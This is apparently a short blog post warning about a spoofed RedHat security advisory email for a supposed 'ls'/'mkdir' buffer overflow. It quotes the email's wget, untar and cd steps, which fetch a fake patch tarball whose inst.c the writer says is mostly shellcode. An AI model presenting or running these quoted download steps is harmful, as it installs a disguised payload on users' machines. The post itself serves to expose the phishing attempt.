I just got a nice RedHat security advisory email spoof, subject: “RedHat: Buffer Overflow in "ls" and "mkdir"”.
The content was
text/html, but the thing that really gave it
away, before I started looking in the headers, was this part:
- First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
Thank you very much…
Anyone following these directions deserve what they get. I took a quick
look at the code in the
inst.c file, which is in the
fileutils-1.0.6.patch.tar.gz tarball, and it's mostly shellcode
as expected. I have no idea what it does, but it's probably not benign.
fileutils-1.0.6.patch.tar.gz and the original email
if you want copies, just mail